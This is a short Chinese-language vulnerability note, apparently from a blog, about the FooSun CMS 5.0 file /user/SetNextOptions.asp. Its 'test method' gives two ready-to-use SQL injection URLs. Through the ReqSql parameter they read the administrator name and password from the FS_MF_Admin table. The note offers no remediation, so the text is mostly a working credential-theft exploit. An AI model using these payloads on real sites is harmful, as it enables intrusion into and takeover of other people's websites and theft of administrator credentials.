影响版本:
FooSun 5.0
漏洞描述:
风讯网站内容管理系统,现代企业构建自己的门户信息网站将单一的展示转向多类型信息交互层面的web应用程序,自由、开源的设计理念能让你构架出任意风格的网络平台 风讯foosun的注册文件存在漏洞 可以自己读取到管理员帐号和密码。 漏洞文件:/user/SetNextOptions.asp
测试方法:
管理员帐号: /user/SetNextOptions.asp?sType=1&EquValue=aaaa&SelectName=aaa&ReqSql=select+1,admin_name,3,4,5,6,7,8++from+FS_MF_Admin 管理员密码: /user/SetNextOptions.asp?sType=1&EquValue=aaaa&SelectName=aaa&ReqSql=select+1,admin_pass_word,3,4,5,6,7,8++from+FS_MF_Admin
0 条评论。